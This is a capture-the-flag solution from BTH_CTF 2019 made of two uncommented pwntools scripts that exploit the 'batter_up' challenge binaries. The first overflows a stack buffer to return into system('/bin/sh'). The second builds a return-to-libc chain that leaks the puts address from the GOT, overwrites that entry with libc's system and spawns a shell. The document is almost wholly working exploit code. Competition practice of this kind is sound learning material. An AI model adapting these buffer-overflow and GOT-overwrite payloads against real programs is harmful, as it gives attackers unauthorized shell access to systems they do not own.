BTH_CTF 2019

batter_up

from pwn import *

p = process("./batter_up")
elf = ELF("./batter_up")

system = elf.plt['system']
binsh = 0x804874a
print p.recv()

payload = ""
payload += "A"*48
payload += p32(system)
payload += "DDDD"
payload += p32(binsh)

p.sendline(payload)

p.interactive()

batter_up 3

from pwn import *

p = process("./batter_up_3")
elf = ELF("./batter_up_3")
lib = ELF("./libc_e3d54f5709190f15a9c51089c70f2069771913c1.so.6")

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
gets = elf.plt['gets']
bss = elf.bss()
pr = 0x080483d1
ppr = 0x0804870a
pppr = 0x08048709

p.recv()

payload = ""
payload += "A"*44
payload += p32(puts_plt)
payload += p32(pr)
payload += p32(puts_got)

payload += p32(gets)
payload += p32(pr)
payload += p32(bss)

payload += p32(puts_plt)
payload += p32(pr)
payload += p32(bss)

payload += p32(gets)
payload += p32(pr)
payload += p32(puts_got)

payload += p32(puts_plt)
payload += "DDDD"
payload += p32(bss)

p.sendline(payload)

libc_puts = u32(p.recv(4))
log.info("libc_plt = {}".format(hex(libc_puts)))
libc_system = libc_puts - 0x24f00
log.info("libc_system = {}".format(hex(libc_system)))
p.sendline("/bin/sh\x00")

p.sendline(p32(libc_system))

p.interactive()